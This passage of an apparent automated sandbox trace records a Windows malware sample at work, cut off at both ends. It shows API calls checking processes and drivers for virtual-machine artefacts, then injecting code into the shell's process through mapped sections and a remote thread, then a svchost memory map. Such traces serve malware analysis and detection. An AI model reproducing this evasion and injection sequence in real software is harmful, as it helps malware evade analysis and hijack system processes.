(_Str="or-finger.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.826] wcsstr (_Str="travel imagine recently.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.826] wcsstr (_Str="travel imagine recently.exe", _SubStr="qga.exe") returned 0x0 [0150.826] wcsstr (_Str="travel imagine recently.exe", _SubStr="windanr.exe") returned 0x0 [0150.826] wcsstr (_Str="travel imagine recently.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.826] wcsstr (_Str="travel imagine recently.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.826] wcsstr (_Str="travel imagine recently.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.826] wcsstr (_Str="travel imagine recently.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.826] wcsstr (_Str="school_for.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.827] wcsstr (_Str="school_for.exe", _SubStr="qga.exe") returned 0x0 [0150.827] wcsstr (_Str="school_for.exe", _SubStr="windanr.exe") returned 0x0 [0150.827] wcsstr (_Str="school_for.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.827] wcsstr (_Str="school_for.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.827] wcsstr (_Str="school_for.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.827] wcsstr (_Str="school_for.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.827] wcsstr (_Str="whosefirmthe.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.827] wcsstr (_Str="whosefirmthe.exe", _SubStr="qga.exe") returned 0x0 [0150.827] wcsstr (_Str="whosefirmthe.exe", _SubStr="windanr.exe") returned 0x0 [0150.827] wcsstr (_Str="whosefirmthe.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.828] LocalFree (hMem=0x4149b0) returned 0x0 [0150.828] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x18ff5c | out: SystemInformation=0x0, ResultLength=0x18ff5c*=0xbed4) returned 0xc0000004 [0150.829] LocalAlloc (uFlags=0x40, uBytes=0xced4) returned 0x4149b0 [0150.829] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x4149b0, Length=0xced4, ResultLength=0x18ff5c | out: SystemInformation=0x4149b0, ResultLength=0x18ff5c*=0xbed4) returned 0x0 [0150.830] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0150.830] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0150.830] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0150.830] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0150.830] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0150.830] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0150.830] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0150.830] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0150.830] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0150.831] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0150.831] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0150.831] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0150.831] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0150.831] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0150.831] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0150.831] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0150.831] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0150.831] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 [0150.831] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0150.831] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0150.831] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0150.831] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0150.831] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0150.831] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0150.832] strstr (_Str="kdcom.dll", _SubStr="vmci.s") returned 0x0 [0150.832] strstr (_Str="kdcom.dll", _SubStr="vmusbm") returned 0x0 [0150.832] strstr (_Str="kdcom.dll", _SubStr="vmmous") returned 0x0 [0150.832] strstr (_Str="kdcom.dll", _SubStr="vm3dmp") returned 0x0 [0150.832] strstr (_Str="kdcom.dll", _SubStr="vmrawd") returned 0x0 [0150.832] strstr (_Str="kdcom.dll", _SubStr="vmmemc") returned 0x0 [0150.832] strstr (_Str="kdcom.dll", _SubStr="vboxgu") returned 0x0 [0150.832] strstr (_Str="kdcom.dll", _SubStr="vboxsf") returned 0x0 [0150.832] strstr (_Str="kdcom.dll", _SubStr="vboxmo") returned 0x0 [0150.832] strstr (_Str="kdcom.dll", _SubStr="vboxvi") returned 0x0 [0150.832] strstr (_Str="kdcom.dll", _SubStr="vboxdi") returned 0x0 [0150.832] strstr (_Str="kdcom.dll", _SubStr="vioser") returned 0x0 [0150.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0150.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0150.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0150.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0150.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0150.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0150.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 [0150.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0150.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0150.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0150.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0150.833] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0150.833] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0150.833] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0150.833] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0150.833] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0150.833] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0150.834] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0150.834] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0150.834] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0150.834] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0150.834] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0150.834] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0150.834] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0150.834] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0150.834] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0150.834] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0150.834] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0150.834] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0150.834] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0150.834] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0150.834] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0150.834] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0150.834] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0150.834] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0150.834] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0150.835] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0150.835] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0150.836] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0150.836] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0150.836] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0150.836] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0150.836] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0150.836] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0150.836] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0150.843] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0150.843] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0150.843] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0150.844] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0150.844] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0150.844] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0150.844] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0150.846] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0150.846] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0150.846] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0150.846] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0150.848] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0150.848] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0150.848] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0150.848] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0150.849] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0150.849] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0150.849] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0150.849] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0150.849] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0150.849] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0150.849] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0150.849] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0150.849] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0150.849] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0150.849] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0150.849] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0150.849] strstr (_Str="acpi.sys", _SubStr="vmci.s") returned 0x0 [0150.849] strstr (_Str="acpi.sys", _SubStr="vmusbm") returned 0x0 [0150.849] strstr (_Str="acpi.sys", _SubStr="vmmous") returned 0x0 [0150.850] strstr (_Str="acpi.sys", _SubStr="vm3dmp") returned 0x0 [0150.850] strstr (_Str="acpi.sys", _SubStr="vmrawd") returned 0x0 [0150.850] strstr (_Str="acpi.sys", _SubStr="vmmemc") returned 0x0 [0150.850] strstr (_Str="acpi.sys", _SubStr="vboxgu") returned 0x0 [0150.850] strstr (_Str="acpi.sys", _SubStr="vboxsf") returned 0x0 [0150.850] strstr (_Str="acpi.sys", _SubStr="vboxmo") returned 0x0 [0150.851] strstr (_Str="acpi.sys", _SubStr="vboxvi") returned 0x0 [0150.851] strstr (_Str="acpi.sys", _SubStr="vboxdi") returned 0x0 [0150.851] strstr (_Str="acpi.sys", _SubStr="vioser") returned 0x0 [0150.851] strstr (_Str="wmilib.sys", _SubStr="vmci.s") returned 0x0 [0150.851] strstr (_Str="wmilib.sys", _SubStr="vmusbm") returned 0x0 [0150.851] strstr (_Str="wmilib.sys", _SubStr="vmmous") returned 0x0 [0150.851] strstr (_Str="wmilib.sys", _SubStr="vm3dmp") returned 0x0 [0150.851] strstr (_Str="wmilib.sys", _SubStr="vmrawd") returned 0x0 [0150.851] strstr (_Str="wmilib.sys", _SubStr="vmmemc") returned 0x0 [0150.851] strstr (_Str="wmilib.sys", _SubStr="vboxgu") returned 0x0 [0150.851] strstr (_Str="wmilib.sys", _SubStr="vboxsf") returned 0x0 [0150.851] strstr (_Str="wmilib.sys", _SubStr="vboxmo") returned 0x0 [0150.851] strstr (_Str="wmilib.sys", _SubStr="vboxvi") returned 0x0 [0150.851] strstr (_Str="wmilib.sys", _SubStr="vboxdi") returned 0x0 [0150.851] strstr (_Str="wmilib.sys", _SubStr="vioser") returned 0x0 [0150.852] strstr (_Str="msisadrv.sys", _SubStr="vmci.s") returned 0x0 [0150.852] strstr (_Str="msisadrv.sys", _SubStr="vmusbm") returned 0x0 [0150.852] strstr (_Str="msisadrv.sys", _SubStr="vmmous") returned 0x0 [0150.852] strstr (_Str="msisadrv.sys", _SubStr="vm3dmp") returned 0x0 [0150.852] strstr (_Str="msisadrv.sys", _SubStr="vmrawd") returned 0x0 [0150.852] strstr (_Str="msisadrv.sys", _SubStr="vmmemc") returned 0x0 [0150.852] strstr (_Str="msisadrv.sys", _SubStr="vboxgu") returned 0x0 [0150.852] strstr (_Str="msisadrv.sys", _SubStr="vboxsf") returned 0x0 [0150.852] strstr (_Str="msisadrv.sys", _SubStr="vboxmo") returned 0x0 [0150.852] strstr (_Str="msisadrv.sys", _SubStr="vboxvi") returned 0x0 [0150.852] strstr (_Str="msisadrv.sys", _SubStr="vboxdi") returned 0x0 [0150.852] strstr (_Str="msisadrv.sys", _SubStr="vioser") returned 0x0 [0150.852] strstr (_Str="pci.sys", _SubStr="vmci.s") returned 0x0 [0150.852] strstr (_Str="pci.sys", _SubStr="vmusbm") returned 0x0 [0150.852] strstr (_Str="pci.sys", _SubStr="vmmous") returned 0x0 [0150.852] strstr (_Str="pci.sys", _SubStr="vm3dmp") returned 0x0 [0150.852] strstr (_Str="pci.sys", _SubStr="vmrawd") returned 0x0 [0150.852] strstr (_Str="pci.sys", _SubStr="vmmemc") returned 0x0 [0150.853] strstr (_Str="pci.sys", _SubStr="vboxgu") returned 0x0 [0150.853] strstr (_Str="pci.sys", _SubStr="vboxsf") returned 0x0 [0150.853] strstr (_Str="pci.sys", _SubStr="vboxmo") returned 0x0 [0150.853] strstr (_Str="pci.sys", _SubStr="vboxvi") returned 0x0 [0150.853] strstr (_Str="pci.sys", _SubStr="vboxdi") returned 0x0 [0150.853] strstr (_Str="pci.sys", _SubStr="vioser") returned 0x0 [0151.226] strstr (_Str="vdrvroot.sys", _SubStr="vmci.s") returned 0x0 [0151.226] strstr (_Str="vdrvroot.sys", _SubStr="vmusbm") returned 0x0 [0151.226] strstr (_Str="vdrvroot.sys", _SubStr="vmmous") returned 0x0 [0151.226] strstr (_Str="vdrvroot.sys", _SubStr="vm3dmp") returned 0x0 [0151.226] strstr (_Str="vdrvroot.sys", _SubStr="vmrawd") returned 0x0 [0151.226] strstr (_Str="vdrvroot.sys", _SubStr="vmmemc") returned 0x0 [0151.227] strstr (_Str="vdrvroot.sys", _SubStr="vboxgu") returned 0x0 [0151.227] strstr (_Str="vdrvroot.sys", _SubStr="vboxsf") returned 0x0 [0151.227] strstr (_Str="vdrvroot.sys", _SubStr="vboxmo") returned 0x0 [0151.227] strstr (_Str="vdrvroot.sys", _SubStr="vboxvi") returned 0x0 [0151.227] strstr (_Str="vdrvroot.sys", _SubStr="vboxdi") returned 0x0 [0151.227] strstr (_Str="vdrvroot.sys", _SubStr="vioser") returned 0x0 [0151.227] strstr (_Str="partmgr.sys", _SubStr="vmci.s") returned 0x0 [0151.227] strstr (_Str="partmgr.sys", _SubStr="vmusbm") returned 0x0 [0151.227] strstr (_Str="partmgr.sys", _SubStr="vmmous") returned 0x0 [0151.227] strstr (_Str="partmgr.sys", _SubStr="vm3dmp") returned 0x0 [0151.227] strstr (_Str="partmgr.sys", _SubStr="vmrawd") returned 0x0 [0151.227] strstr (_Str="partmgr.sys", _SubStr="vmmemc") returned 0x0 [0151.227] strstr (_Str="partmgr.sys", _SubStr="vboxgu") returned 0x0 [0151.227] strstr (_Str="partmgr.sys", _SubStr="vboxsf") returned 0x0 [0151.227] strstr (_Str="partmgr.sys", _SubStr="vboxmo") returned 0x0 [0151.227] strstr (_Str="partmgr.sys", _SubStr="vboxvi") returned 0x0 [0151.227] strstr (_Str="partmgr.sys", _SubStr="vboxdi") returned 0x0 [0151.227] strstr (_Str="partmgr.sys", _SubStr="vioser") returned 0x0 [0151.228] strstr (_Str="volmgr.sys", _SubStr="vmci.s") returned 0x0 [0151.228] strstr (_Str="volmgr.sys", _SubStr="vmusbm") returned 0x0 [0151.228] strstr (_Str="volmgr.sys", _SubStr="vmmous") returned 0x0 [0151.228] strstr (_Str="volmgr.sys", _SubStr="vm3dmp") returned 0x0 [0151.228] strstr (_Str="volmgr.sys", _SubStr="vmrawd") returned 0x0 [0151.228] strstr (_Str="volmgr.sys", _SubStr="vmmemc") returned 0x0 [0151.228] strstr (_Str="volmgr.sys", _SubStr="vboxgu") returned 0x0 [0151.228] strstr (_Str="volmgr.sys", _SubStr="vboxsf") returned 0x0 [0151.228] strstr (_Str="volmgr.sys", _SubStr="vboxmo") returned 0x0 [0151.228] strstr (_Str="volmgr.sys", _SubStr="vboxvi") returned 0x0 [0151.228] strstr (_Str="volmgr.sys", _SubStr="vboxdi") returned 0x0 [0151.228] strstr (_Str="volmgr.sys", _SubStr="vioser") returned 0x0 [0151.229] strstr (_Str="volmgrx.sys", _SubStr="vmci.s") returned 0x0 [0151.229] strstr (_Str="volmgrx.sys", _SubStr="vmusbm") returned 0x0 [0151.229] strstr (_Str="volmgrx.sys", _SubStr="vmmous") returned 0x0 [0151.229] strstr (_Str="volmgrx.sys", _SubStr="vm3dmp") returned 0x0 [0151.229] strstr (_Str="volmgrx.sys", _SubStr="vmrawd") returned 0x0 [0151.229] strstr (_Str="volmgrx.sys", _SubStr="vmmemc") returned 0x0 [0151.229] strstr (_Str="volmgrx.sys", _SubStr="vboxgu") returned 0x0 [0151.229] strstr (_Str="volmgrx.sys", _SubStr="vboxsf") returned 0x0 [0151.229] strstr (_Str="volmgrx.sys", _SubStr="vboxmo") returned 0x0 [0151.229] strstr (_Str="volmgrx.sys", _SubStr="vboxvi") returned 0x0 [0151.229] strstr (_Str="volmgrx.sys", _SubStr="vboxdi") returned 0x0 [0151.229] strstr (_Str="volmgrx.sys", _SubStr="vioser") returned 0x0 [0151.229] strstr (_Str="mountmgr.sys", _SubStr="vmci.s") returned 0x0 [0151.229] strstr (_Str="mountmgr.sys", _SubStr="vmusbm") returned 0x0 [0151.229] strstr (_Str="mountmgr.sys", _SubStr="vmmous") returned 0x0 [0151.229] strstr (_Str="mountmgr.sys", _SubStr="vm3dmp") returned 0x0 [0151.229] strstr (_Str="mountmgr.sys", _SubStr="vmrawd") returned 0x0 [0151.229] strstr (_Str="mountmgr.sys", _SubStr="vmmemc") returned 0x0 [0151.230] strstr (_Str="mountmgr.sys", _SubStr="vboxgu") returned 0x0 [0151.230] strstr (_Str="mountmgr.sys", _SubStr="vboxsf") returned 0x0 [0151.230] strstr (_Str="mountmgr.sys", _SubStr="vboxmo") returned 0x0 [0151.230] strstr (_Str="mountmgr.sys", _SubStr="vboxvi") returned 0x0 [0151.230] strstr (_Str="mountmgr.sys", _SubStr="vboxdi") returned 0x0 [0151.230] strstr (_Str="mountmgr.sys", _SubStr="vioser") returned 0x0 [0151.230] strstr (_Str="atapi.sys", _SubStr="vmci.s") returned 0x0 [0151.230] strstr (_Str="atapi.sys", _SubStr="vmusbm") returned 0x0 [0151.230] strstr (_Str="atapi.sys", _SubStr="vmmous") returned 0x0 [0151.230] strstr (_Str="atapi.sys", _SubStr="vm3dmp") returned 0x0 [0151.230] strstr (_Str="atapi.sys", _SubStr="vmrawd") returned 0x0 [0151.230] strstr (_Str="atapi.sys", _SubStr="vmmemc") returned 0x0 [0151.230] strstr (_Str="atapi.sys", _SubStr="vboxgu") returned 0x0 [0151.230] strstr (_Str="atapi.sys", _SubStr="vboxsf") returned 0x0 [0151.230] strstr (_Str="atapi.sys", _SubStr="vboxmo") returned 0x0 [0151.230] strstr (_Str="atapi.sys", _SubStr="vboxvi") returned 0x0 [0151.230] strstr (_Str="atapi.sys", _SubStr="vboxdi") returned 0x0 [0151.230] strstr (_Str="atapi.sys", _SubStr="vioser") returned 0x0 [0151.231] strstr (_Str="ataport.sys", _SubStr="vmci.s") returned 0x0 [0151.231] strstr (_Str="ataport.sys", _SubStr="vmusbm") returned 0x0 [0151.231] strstr (_Str="ataport.sys", _SubStr="vmmous") returned 0x0 [0151.231] strstr (_Str="ataport.sys", _SubStr="vm3dmp") returned 0x0 [0151.231] strstr (_Str="ataport.sys", _SubStr="vmrawd") returned 0x0 [0151.231] strstr (_Str="ataport.sys", _SubStr="vmmemc") returned 0x0 [0151.231] strstr (_Str="ataport.sys", _SubStr="vboxgu") returned 0x0 [0151.231] strstr (_Str="ataport.sys", _SubStr="vboxsf") returned 0x0 [0151.231] strstr (_Str="ataport.sys", _SubStr="vboxmo") returned 0x0 [0151.231] strstr (_Str="ataport.sys", _SubStr="vboxvi") returned 0x0 [0151.231] strstr (_Str="ataport.sys", _SubStr="vboxdi") returned 0x0 [0151.231] strstr (_Str="ataport.sys", _SubStr="vioser") returned 0x0 [0151.231] strstr (_Str="msahci.sys", _SubStr="vmci.s") returned 0x0 [0151.231] strstr (_Str="msahci.sys", _SubStr="vmusbm") returned 0x0 [0151.231] strstr (_Str="msahci.sys", _SubStr="vmmous") returned 0x0 [0151.232] strstr (_Str="msahci.sys", _SubStr="vm3dmp") returned 0x0 [0151.232] strstr (_Str="msahci.sys", _SubStr="vmrawd") returned 0x0 [0151.232] strstr (_Str="msahci.sys", _SubStr="vmmemc") returned 0x0 [0151.232] strstr (_Str="msahci.sys", _SubStr="vboxgu") returned 0x0 [0151.232] strstr (_Str="msahci.sys", _SubStr="vboxsf") returned 0x0 [0151.232] strstr (_Str="msahci.sys", _SubStr="vboxmo") returned 0x0 [0151.234] LocalFree (hMem=0x4149b0) returned 0x0 [0151.234] Sleep (dwMilliseconds=0x1388) [0157.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18ff24*=0x0, ZeroBits=0x0, RegionSize=0x18ff2c*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x18ff24*=0x210000, RegionSize=0x18ff2c*=0x6000) returned 0x0 [0157.003] GetShellWindow () returned 0x100e6 [0157.003] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0x18fed0 | out: lpdwProcessId=0x18fed0) returned 0x13c [0157.004] NtOpenProcess (in: ProcessHandle=0x18ff20, DesiredAccess=0x40, ObjectAttributes=0x18ff08*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x18ff00*(UniqueProcess=0x390, UniqueThread=0x0) | out: ProcessHandle=0x18ff20*=0x80) returned 0x0 [0157.004] NtDuplicateObject (in: SourceProcessHandle=0x80, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x18ff24, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x18ff24*=0x84) returned 0x0 [0157.004] NtCreateSection (in: SectionHandle=0x18fedc, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x18fee0, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fedc*=0x88) returned 0x0 [0157.004] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0xffffffff, BaseAddress=0x18feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18feec*=0x220000, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000) returned 0x0 [0157.004] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0x84, BaseAddress=0x18fef4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18fef4*=0x2580000, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000) returned 0x0 [0157.006] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x220000, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0x2a [0157.006] NtCreateSection (in: SectionHandle=0x18fed8, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x18fee0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fed8*=0x8c) returned 0x0 [0157.006] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0xffffffff, BaseAddress=0x18fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18fee8*=0x2c0000, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000) returned 0x0 [0157.006] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0x84, BaseAddress=0x18fef0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x18fef0*=0x2590000, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000) returned 0x0 [0157.010] RtlCreateUserThread (in: ProcessHandle=0x84, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x2591930, Parameter=0x2580000, ThreadHandle=0x18fe30*=0x77a16c9a77a16c93, ClientId=0x0 | out: ThreadHandle=0x18fe30*=0x90, ClientId=0x0) returned 0x0 [0157.709] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xdb4d000" os_pid = "0x2c0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7ac" [0xc000000f], "LOCAL" [0x7] Region: id = 2900 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2901 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2902 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2903 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2904 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2905 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2906 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 2907 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2908 start_va = 0x160000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2909 start_va = 0x260000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2910 start_va = 0x360000 end_va = 0x36cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: 